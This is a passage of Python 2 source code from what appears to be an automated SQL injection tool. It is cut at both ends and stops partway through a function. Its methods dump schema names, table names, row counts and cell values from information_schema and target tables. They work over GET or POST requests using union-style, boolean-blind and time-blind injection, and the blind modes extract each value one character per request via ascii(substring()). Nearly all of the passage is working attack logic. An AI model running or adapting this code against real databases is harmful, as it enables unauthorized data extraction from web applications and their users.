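    def get_content_count(self, database_name, table_name):
        """Return the row count of ``database_name.table_name`` via the configured method.

        Dispatches on ``self.sqlimethod``:
          * ``"normal"`` -> ``normal_injection`` (result used as returned)
          * ``"build"``  -> ``build_injection`` with ``lens=self.len``, cast to int
          * ``"time"``   -> ``time_injection`` with ``times=self.time``, cast to int

        All three pass ``select="count(*)"``, ``source="<db>.<table>"``,
        ``self.dealpayload``, ``self.Data``, ``isCount=True`` and
        ``self.sqlirequest`` to the helper.

        Args:
            database_name: schema name, concatenated with ``table_name`` into ``source``.
            table_name: table whose ``count(*)`` is queried.

        Returns:
            The count (as returned by the helper for ``"normal"``, an ``int`` for
            ``"build"`` / ``"time"``), or ``None`` for an unrecognised
            ``sqlimethod`` -- that case previously fell through silently; it now
            logs a warning but keeps the ``None`` return for existing callers.
        """
        logger.debug("Start sqli table %s content amount..." % table_name)
        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        method = self.sqlimethod
        if method not in ("normal", "build", "time"):
            # Misconfiguration used to be invisible (implicit None); make it visible
            # without changing the return contract.
            logger.warning("Unknown sqlimethod %r, content count not attempted..." % (method,))
            return None

        logger.debug("The sqlimethod is %s..." % method)
        logger.debug("Start table's %s content amount sqli..." % table_name)

        # Arguments shared by all three helpers; only lens/times differ.
        common = dict(select="count(*)",
                      source=database_name + "." + table_name,
                      dealpayload=self.dealpayload,
                      data=self.Data,
                      isCount=True,
                      sqlirequest=self.sqlirequest)

        if method == "normal":
            content_count = normal_injection(**common)
            logger.debug("Content account sqli success...The count is %d..." % content_count)
        else:
            if method == "build":
                retVal = build_injection(lens=self.len, **common)
            else:
                retVal = time_injection(times=self.time, **common)
            # build/time helpers return a raw value; the original cast it to int here.
            content_count = int(retVal)
            logger.debug("Content account sqli success...The content_count is %d..." % content_count)
            logger.info("[*] content_count: %d" % content_count)

        logger.info("[*] content count: %d" % content_count)
        return content_count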
    def get_database(self):
        """Enumerate schema names from information_schema.SCHEMATA into self.databases_name.

        Dispatches on self.sqlirequest ("GET" / "POST") and then on self.sqlimethod
        ("normal" / "build" / "time").  The GET and POST branches are line-for-line
        the same apart from one debug message, because sqlirequest is only forwarded
        to the injection helpers.  Every schema name except "information_schema" is
        appended to self.databases_name (the list is not cleared first, so repeated
        calls accumulate).  Any other sqlirequest / sqlimethod value falls through
        silently and collects nothing.  Finally the comma-joined list is printed.
        Returns None.

        Per method:
          * "normal": two requests per schema (length, then the name as a string).
          * "build" / "time": the name is rebuilt one character at a time from
            ascii(substring(SCHEMA_NAME, j, 1)); chr(retVal) assumes the helper
            returns an int when isStrings=True -- TODO confirm against the helper.
        The "normal" branches report the count with a Python 2 print statement,
        the others via logger.info.  The per-character loops issue one request per
        character of every name, so the request volume against information_schema
        grows with the total name length -- the usual server-side signal for this
        technique.
        """

        if self.sqlirequest == "GET":
            logger.debug("The sqlirequest is %s, start sqli databases..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")
                # First extract the number of databases

                databases_number = normal_injection(
                    select='COUNT(SCHEMA_NAME)',
                    source='information_schema.SCHEMATA',
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Databases amount sqli success...The databases_number is %d..."
                    % databases_number)
                # Python 2 print statement; the build/time branches use logger.info here.
                print "[*] databases_number: %d" % databases_number

                # One iteration per database (progress bar disabled)
                for i in trange(int(databases_number),
                                desc="Database sqli...",
                                leave=False,
                                disable=True):
                    # First the length of the database name
                    logger.debug("Start %dth database length sqli..." %
                                 (i + 1))

                    databases_name_len = normal_injection(
                        select='length(SCHEMA_NAME)',
                        source='information_schema.SCHEMATA',
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name itself (fetched as a whole string)
                    logger.debug("Start %dth database name sqli..." % (i + 1))

                    databases_name = normal_injection(
                        select='SCHEMA_NAME',
                        source='information_schema.SCHEMATA',
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)
                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")

                retVal = build_injection(select="COUNT(SCHEMA_NAME)",
                                         source="information_schema.SCHEMATA",
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                databases_number = int(retVal)

                logger.debug(
                    "Databases amount sqli success...The databases_number is %d..."
                    % databases_number)
                logger.info("[*] databases_number: %d" % databases_number)

                for i in range(0, int(databases_number)):

                    logger.debug("Start %dth database length sqli..." %
                                 (i + 1))
                    # Then the length of the database name

                    retVal = build_injection(
                        select="length(SCHEMA_NAME)",
                        source="information_schema.SCHEMATA",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    databases_name_len = int(retVal)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name, one character per request
                    # Reset database_name before accumulating
                    databases_name = ""
                    logger.debug("Start %dth database sqli..." % (i + 1))
                    for j in trange(int(databases_name_len),
                                    desc='%dth Database sqli' % (i + 1),
                                    leave=False):

                        retVal = build_injection(
                            select="ascii(substring(SCHEMA_NAME," +
                            repr(j + 1) + ",1))",
                            source="information_schema.SCHEMATA",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        # chr() requires an int here -- TODO confirm build_injection's return type
                        databases_name += chr(retVal)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)

                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")

                retVal = time_injection(select="COUNT(SCHEMA_NAME)",
                                        source="information_schema.SCHEMATA",
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                databases_number = int(retVal)

                logger.debug(
                    "Databases amount sqli success...The databases_number is %d..."
                    % databases_number)
                logger.info("[*] databases_number: %d" % databases_number)

                for i in range(0, int(databases_number)):
                    logger.debug("Start %dth database length sqli..." %
                                 (i + 1))

                    # Then the length of the database name

                    retVal = time_injection(
                        select="length(SCHEMA_NAME)",
                        source="information_schema.SCHEMATA",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    databases_name_len = int(retVal)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name, one character per request
                    # Reset databases_name before accumulating
                    databases_name = ""
                    logger.debug("Start %dth database sqli..." % (i + 1))

                    for j in trange(int(databases_name_len),
                                    desc='%dth Database sqli' % (i + 1),
                                    leave=False):
                        retVal = time_injection(
                            select="ascii(substring(SCHEMA_NAME," +
                            repr(j + 1) + ",1))",
                            source="information_schema.SCHEMATA",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        # chr() requires an int here -- TODO confirm time_injection's return type
                        databases_name += chr(retVal)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)

                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

        # Then the POST case (same logic as GET; sqlirequest is only forwarded)
        elif self.sqlirequest == "POST":
            logger.debug("The sqlirequest is %s, start sqli databases..." %
                         self.sqlirequest)

            if self.sqlimethod == "normal":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")

                # First extract the number of databases

                databases_number = normal_injection(
                    select='COUNT(SCHEMA_NAME)',
                    source='information_schema.SCHEMATA',
                    dealpayload=self.dealpayload,
                    data=self.Data,
                    isCount=True,
                    sqlirequest=self.sqlirequest)

                logger.debug(
                    "Databases account sqli success...The databases_number is %d..."
                    % databases_number)
                # Python 2 print statement; the build/time branches use logger.info here.
                print "[*] databases_number: %d" % databases_number

                # One iteration per database (progress bar disabled)
                for i in trange(int(databases_number),
                                desc="Database sqli...",
                                leave=False,
                                disable=True):
                    # First the length of the database name

                    databases_name_len = normal_injection(
                        select='length(SCHEMA_NAME)',
                        source='information_schema.SCHEMATA',
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name itself (fetched as a whole string)
                    logger.debug("Start %dth database name sqli..." % (i + 1))

                    databases_name = normal_injection(
                        select='SCHEMA_NAME',
                        source='information_schema.SCHEMATA',
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isStrings=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)
                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

            elif self.sqlimethod == "build":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")

                retVal = build_injection(select="COUNT(SCHEMA_NAME)",
                                         source="information_schema.SCHEMATA",
                                         dealpayload=self.dealpayload,
                                         data=self.Data,
                                         lens=self.len,
                                         isCount=True,
                                         sqlirequest=self.sqlirequest)
                databases_number = int(retVal)

                logger.debug(
                    "Databases amount sqli success...The databases_number is %d..."
                    % databases_number)
                logger.info("[*] databases_number: %d" % databases_number)

                for i in range(0, int(databases_number)):

                    # Then the length of the database name
                    logger.debug("Start %dth database length sqli..." %
                                 (i + 1))

                    retVal = build_injection(
                        select="length(SCHEMA_NAME)",
                        source="information_schema.SCHEMATA",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    databases_name_len = int(retVal)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name, one character per request
                    # Reset databases_name before accumulating
                    databases_name = ""
                    logger.debug("Start %dth database sqli..." % (i + 1))

                    for j in trange(int(databases_name_len),
                                    desc='%dth Database sqli' % (i + 1),
                                    leave=False):
                        retVal = build_injection(
                            select="ascii(substring(SCHEMA_NAME," +
                            repr(j + 1) + ",1))",
                            source="information_schema.SCHEMATA",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        # chr() requires an int here -- TODO confirm build_injection's return type
                        databases_name += chr(retVal)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)

                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

            elif self.sqlimethod == "time":

                logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                logger.debug("Start database amount sqli...")

                retVal = time_injection(select="COUNT(SCHEMA_NAME)",
                                        source="information_schema.SCHEMATA",
                                        dealpayload=self.dealpayload,
                                        data=self.Data,
                                        times=self.time,
                                        isCount=True,
                                        sqlirequest=self.sqlirequest)
                databases_number = int(retVal)

                logger.debug(
                    "Databases amount sqli success...The databases_number is %d..."
                    % databases_number)
                logger.info("[*] databases_number: %d" % databases_number)

                for i in range(0, int(databases_number)):
                    # Then the length of the database name

                    logger.debug("Start %dth database length sqli..." %
                                 (i + 1))

                    retVal = time_injection(
                        select="length(SCHEMA_NAME)",
                        source="information_schema.SCHEMATA",
                        limit=i,
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        times=self.time,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    databases_name_len = int(retVal)

                    logger.debug(
                        "%dth Databases name length sqli success...The databases_name_len is %d..."
                        % ((i + 1), databases_name_len))
                    logger.info("[*] %dth databases_name_len: %d" %
                                ((i + 1), databases_name_len))

                    # Then the database name, one character per request
                    # Reset databases_name before accumulating
                    databases_name = ""
                    logger.debug("Start %dth database sqli..." % (i + 1))

                    for j in trange(int(databases_name_len),
                                    desc='%dth Database sqli' % (i + 1),
                                    leave=False):
                        retVal = time_injection(
                            select="ascii(substring(SCHEMA_NAME," +
                            repr(j + 1) + ",1))",
                            source="information_schema.SCHEMATA",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)
                        # chr() requires an int here -- TODO confirm time_injection's return type
                        databases_name += chr(retVal)

                    logger.debug(
                        "%dth Databases name sqli success...The databases_name is %s..."
                        % ((i + 1), databases_name))

                    # Append to the list unless it is information_schema
                    if databases_name != "information_schema":
                        self.databases_name.append(databases_name)

                    logger.info("[*] %dth databases_name: %s" %
                                ((i + 1), databases_name))

        # Final report: comma-joined list of everything collected so far (Python 2 print)
        databases_name = ','.join(self.databases_name)
        print "[*] databases_name list: " + databases_name
    def get_tables(self):

        # 若databases_name未设置,就跑一下
        if len(self.databases_name) == 0:
            logger.debug("Set the parameters of the self.databases_name...")
            SqliDatabases.get_database(self)

        # 每个databases_name需要跑一次tables_name
        for database_name in self.databases_name:
            # 开始跑database_name
            logger.debug("Start sqli databases %s's tables_name" %
                         database_name)
            tables_name = []

            if self.sqlirequest == "GET":
                logger.debug("The sqlirequest is %s, start sqli tables..." %
                             self.sqlirequest)

                if self.sqlimethod == "normal":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")
                    # 先注tables的数量

                    tables_number = normal_injection(
                        select='COUNT(*)',
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "Table account sqli success...The tables_number is %d..."
                        % tables_number)
                    print "[*] tables_number: %d" % tables_number

                    # 每个循环跑一次tables的数据
                    for i in trange(int(tables_number),
                                    desc="Table sqli...",
                                    leave=False,
                                    disable=True):
                        # 首先是tablename的长度
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))

                        table_name_len = normal_injection(
                            select='length(table_name)',
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tablename
                        logger.debug("Start %dth table name sqli..." % (i + 1))

                        table_name = normal_injection(
                            select='table_name',
                            source='information_schema.tables',
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "%dth Table name sqli success...The table_name is %s..."
                            % ((i + 1), table_name))

                        # 把table_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

                elif self.sqlimethod == "build":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")

                    retVal = build_injection(
                        select="COUNT(table_name)",
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    tables_number = int(retVal)

                    logger.debug(
                        "Tables amount sqli success...The tables_number is %d..."
                        % tables_number)
                    logger.info("[*] tables_number: %d" % tables_number)

                    for i in range(0, int(tables_number)):
                        # 然后注tables_name 的 length
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))

                        retVal = build_injection(
                            select="length(table_name)",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        table_name_len = int(retVal)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tables名字
                        # 清空table_name
                        table_name = ""
                        logger.debug("Start %dth table sqli..." % (i + 1))

                        for j in trange(int(table_name_len),
                                        desc='%dth Table sqli' % (i + 1),
                                        leave=False):
                            retVal = build_injection(
                                select="ascii(substring(table_name," +
                                repr(j + 1) + ",1))",
                                source="information_schema.tables",
                                conditions="table_schema = '" + database_name +
                                "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)
                            table_name += chr(retVal)

                        logger.debug(
                            "%dth Table name sqli success...The table_name is %s..."
                            % ((i + 1), table_name))

                        # 把table_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

                elif self.sqlimethod == "time":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")

                    retVal = time_injection(select="COUNT(table_name)",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" +
                                            database_name + "'",
                                            dealpayload=self.dealpayload,
                                            data=self.Data,
                                            times=self.time,
                                            isCount=True,
                                            sqlirequest=self.sqlirequest)
                    tables_number = int(retVal)

                    logger.debug(
                        "Tables amount sqli success...The tables_number is %d..."
                        % tables_number)
                    logger.info("[*] tables_number: %d" % tables_number)

                    for i in range(0, int(tables_number)):
                        # 然后注tables_number 的length
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))

                        retVal = time_injection(
                            select="length(table_name)",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        table_name_len = int(retVal)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tables名字
                        # 清空table_name
                        table_name = ""
                        logger.debug("Start %dth table sqli..." % (i + 1))

                        for j in trange(int(table_name_len),
                                        desc='%dth Table sqli' % (i + 1),
                                        leave=False):
                            retVal = time_injection(
                                select="ascii(substring(table_name," +
                                repr(j + 1) + ",1))",
                                source="information_schema.tables",
                                conditions="table_schema = '" + database_name +
                                "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)
                            table_name += chr(retVal)

                        logger.debug(
                            "%dth Table name sqli success...The table_name is %s..."
                            % ((i + 1), table_name))

                        # 把tables_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

            # 然后是post
            elif self.sqlirequest == "POST":
                logger.debug("The sqlirequest is %s, start sqli tables..." %
                             self.sqlirequest)

                if self.sqlimethod == "normal":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")

                    # 先注tables的数量

                    tables_number = normal_injection(
                        select='COUNT(*)',
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        isCount=True,
                        sqlirequest=self.sqlirequest)

                    logger.debug(
                        "Table account sqli success...The tables_number is %d..."
                        % tables_number)
                    print "[*] tables_number: %d" % tables_number

                    # 每个循环跑一次tables的数据
                    for i in trange(int(tables_number),
                                    desc="Table sqli...",
                                    leave=False,
                                    disable=True):
                        # 首先是tablename的长度
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))

                        table_name_len = normal_injection(
                            select='length(table_name)',
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tablename
                        logger.debug("Start %dth table name sqli..." % (i + 1))

                        table_name = normal_injection(
                            select='table_name',
                            source='information_schema.tables',
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isStrings=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "%dth Table name sqli success...The table_name is %s..."
                            % ((i + 1), table_name))

                        # 把tables_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

                elif self.sqlimethod == "build":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")

                    retVal = build_injection(
                        select="COUNT(table_name)",
                        source="information_schema.tables",
                        conditions="table_schema = '" + database_name + "'",
                        dealpayload=self.dealpayload,
                        data=self.Data,
                        lens=self.len,
                        isCount=True,
                        sqlirequest=self.sqlirequest)
                    tables_number = int(retVal)

                    logger.debug(
                        "Tables amount sqli success...The tables_number is %d..."
                        % tables_number)
                    logger.info("[*] tables_number: %d" % tables_number)

                    for i in range(0, int(tables_number)):
                        # 然后注table_name 的 length
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))

                        retVal = build_injection(
                            select="length(table_name)",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        table_name_len = int(retVal)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tables名字
                        # 清空table_name
                        table_name = ""
                        logger.debug("Start %dth table sqli..." % (i + 1))
                        for j in trange(int(table_name_len),
                                        desc='%dth Table sqli' % (i + 1),
                                        leave=False):
                            retVal = build_injection(
                                select="ascii(substring(table_name," +
                                repr(j + 1) + ",1))",
                                source="information_schema.tables",
                                conditions="table_schema = '" + database_name +
                                "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)
                            table_name += chr(retVal)

                            logger.debug(
                                "%dth Table name sqli success...The table_name is %s..."
                                % ((i + 1), table_name))

                        # 把tables_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

                elif self.sqlimethod == "time":

                    logger.debug("The sqlimethod is %s..." % self.sqlimethod)
                    logger.debug("Start table amount sqli...")

                    retVal = time_injection(select="COUNT(table_name)",
                                            source="information_schema.tables",
                                            conditions="table_schema = '" +
                                            database_name + "'",
                                            dealpayload=self.dealpayload,
                                            data=self.Data,
                                            times=self.time,
                                            isCount=True,
                                            sqlirequest=self.sqlirequest)
                    tables_number = int(retVal)

                    logger.debug(
                        "Tables amount sqli success...The tables_number is %d..."
                        % tables_number)
                    logger.info("[*] tables_number: %d" % tables_number)

                    for i in range(0, int(tables_number)):
                        # 然后注tables_number 的length
                        logger.debug("Start %dth table length sqli..." %
                                     (i + 1))
                        retVal = time_injection(
                            select="length(table_name)",
                            source="information_schema.tables",
                            conditions="table_schema = '" + database_name +
                            "'",
                            limit=i,
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        table_name_len = int(retVal)

                        logger.debug(
                            "%dth Table name length sqli success...The table_name_len is %d..."
                            % ((i + 1), table_name_len))
                        logger.info("[*] %dth table_name_len: %d" %
                                    ((i + 1), table_name_len))

                        # 然后注tables名字
                        # 清空table_name
                        table_name = ""
                        logger.debug("Start %dth table sqli..." % (i + 1))

                        for j in trange(int(table_name_len),
                                        desc='%dth Table sqli' % (i + 1),
                                        leave=False):
                            retVal = time_injection(
                                select="ascii(substring(table_name," +
                                repr(j + 1) + ",1))",
                                source="information_schema.tables",
                                conditions="table_schema = '" + database_name +
                                "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)
                            table_name += chr(retVal)

                        logger.debug(
                            "%dth Table name sqli success...The table_name is %s..."
                            % ((i + 1), table_name))

                        # 把tables_name插入列表
                        tables_name.append(table_name)
                        logger.info("[*] %dth table_name: %s" %
                                    ((i + 1), table_name))

            self.tables_name[database_name] = tuple(tables_name)

        print "[*] tables_name list: ", self.tables_name
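    def get_content(self, result, database_name, table_name, column_name, limits):
        """Read one cell (row ``limits`` of ``column_name``) and queue it.

        The extraction strategy is selected by ``self.sqlimethod``:

        * ``"normal"``: one request for the length, one for the value.
        * ``"build"`` and ``"time"``: one request for the length, then one
          request per character through ``ascii(substring(...))``.

        Args:
            result: queue-like object; the pair ``(column_name, content)`` is
                handed to ``result.put`` as a tuple.
            database_name: schema the table belongs to.
            table_name: table to read from.
            column_name: column to read; it is wrapped in backticks.
            limits: zero-based row offset forwarded as ``limit``.

        Returns:
            None. When ``self.sqlimethod`` matches none of the three modes a
            warning is logged and nothing is queued.
        """
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))

        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value.
            logger.debug("Start %dth content length sqli..." % (limits + 1))

            content_len = normal_injection(select="length(`" + column_name + "`)",
                                           source=database_name + "." + table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data, isCount=True,
                                           sqlirequest=self.sqlirequest
                                           )

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # The value itself, fetched in a single request.
            logger.debug("Start %dth content sqli..." % (limits + 1))

            content = normal_injection(select="`" + column_name + "`",
                                       source=database_name + "." + table_name,
                                       limit=limits,
                                       dealpayload=self.dealpayload,
                                       data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                       )

            logger.debug("Content sqli success...The content is %s..." % content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value; the helper returns a raw value,
            # so normalise it to int before using it as a loop bound.
            retVal = build_injection(select="length(`" + column_name + "`)",
                                     source=database_name + "." + table_name,
                                     limit=limits,
                                     dealpayload=self.dealpayload, data=self.Data,
                                     lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Rebuild the value one character per request; substring() is
            # 1-based, hence j + 1.
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
                retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                         source=database_name + "." + table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # Hand the result back as a (column, value) tuple.
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Length of this cell's value; normalised to int as in "build".
            retVal = time_injection(select="length(`" + column_name + "`)",
                                    source=database_name + "." + table_name,
                                    limit=limits,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
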